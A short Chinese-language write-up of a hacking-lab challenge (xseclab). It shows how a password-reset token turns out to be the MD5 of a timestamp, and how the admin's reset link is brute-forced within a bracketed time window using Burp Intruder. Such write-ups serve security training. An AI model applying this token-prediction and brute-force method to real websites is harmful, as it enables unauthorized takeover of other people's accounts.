http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/
點擊忘記密碼,觀察返回信息
admin用戶
admin123用戶
我們分析重置密碼的鏈接請求:
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=64b157a411e59077fcea643739723797&username=admin123
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=155c528733ea476b64f7dcda45b95ae4&username=admin456
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=8cffd052bb1b485b714f5a4654cc64e4&username=admin789
sukey=64b157a411e59077fcea643739723797
唯有這個參數不一致,看樣子是MD5,進行解密試試:
看起來是時間戳,我們進行轉換下格式看看
那么這里admin的重置連接具體為多少呢?我們這樣猜測,先找回admin123的密碼,然后找回admin的密碼,再找回admin123的密碼,之間的時間戳就是admin的,那么嘗試進行爆破即可。
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=a2c58e13046e75028b102d744dec8f74&username=admin123
admin
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin123
a2c58e13046e75028b102d744dec8f74---1566811472
98cee838562bb14b378ab1b0d37836a2---1566811494
admin的重置sukey 就介於:1566811472 到 1566811494 之間
我們嘗試爆破下看看:
請求:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin
burp進行截斷發送到intruder模塊:
可以看待順利枚舉出密碼重置連接,獲取key
參考大神:https://www.freebuf.com/articles/web/176211.html